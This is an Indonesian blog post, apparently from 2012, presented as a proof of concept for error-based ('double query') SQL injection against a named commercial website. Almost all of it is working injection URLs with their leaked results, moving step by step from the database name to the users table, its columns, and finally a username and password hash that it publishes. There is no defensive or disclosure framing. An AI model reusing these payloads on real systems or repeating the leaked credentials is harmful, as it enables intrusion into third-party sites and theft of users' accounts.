Senin, 23 April 2012

POC SQL Injection Double Query I

Duplicate entry 'paulezard_app~1' for key 1
http://www.wardrobesystems.co.uk/preview.php?id=365%20and%20(select%201%20from%20(select%20count(*),concat((select(select%20concat(cast(database()%20as%20char),0x7e))%20from%20information_schema.tables%20where%20table_schema=database()%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)


Duplicate entry 'users~1' for key 1
http://www.wardrobesystems.co.uk/preview.php?id=365%20and%20(select%201%20from%20(select%20count(*),concat((select(select%20concat(cast(table_name%20as%20char),0x7e))%20from%20information_schema.tables%20where%20table_schema=database()%20limit%2012,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)


Duplicate entry 'username~1' for key 1
http://www.wardrobesystems.co.uk/preview.php?id=365%20and%20(select%201%20from%20(select%20count(*),concat((select(select%20concat(cast(column_name%20as%20char),0x7e))%20from%20information_schema.columns%20where%20table_name=0x7573657273%20limit%201,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)


Duplicate entry 'password~1' for key 1
http://www.wardrobesystems.co.uk/preview.php?id=365%20and%20(select%201%20from%20(select%20count(*),concat((select(select%20concat(cast(column_name%20as%20char),0x7e))%20from%20information_schema.columns%20where%20table_name=0x7573657273%20limit%202,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)




Duplicate entry 'philip8993~f17bdd90988bfec56f279e087f1ce6c9~1' for key 1
http://www.wardrobesystems.co.uk/preview.php?id=365%20and%20(select%201%20from%20(select%20count(*),concat((select(select%20concat(cast(concat(username,0x7e,password)%20as%20char),0x7e))%20from%20users%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)


user : philip8993
pass : f17bdd90988bfec56f279e087f1ce6c9 -->>

POC SQL Injection Double Query I Rating: 4.5 Diposkan Oleh: r007-

0 komentar:

Posting Komentar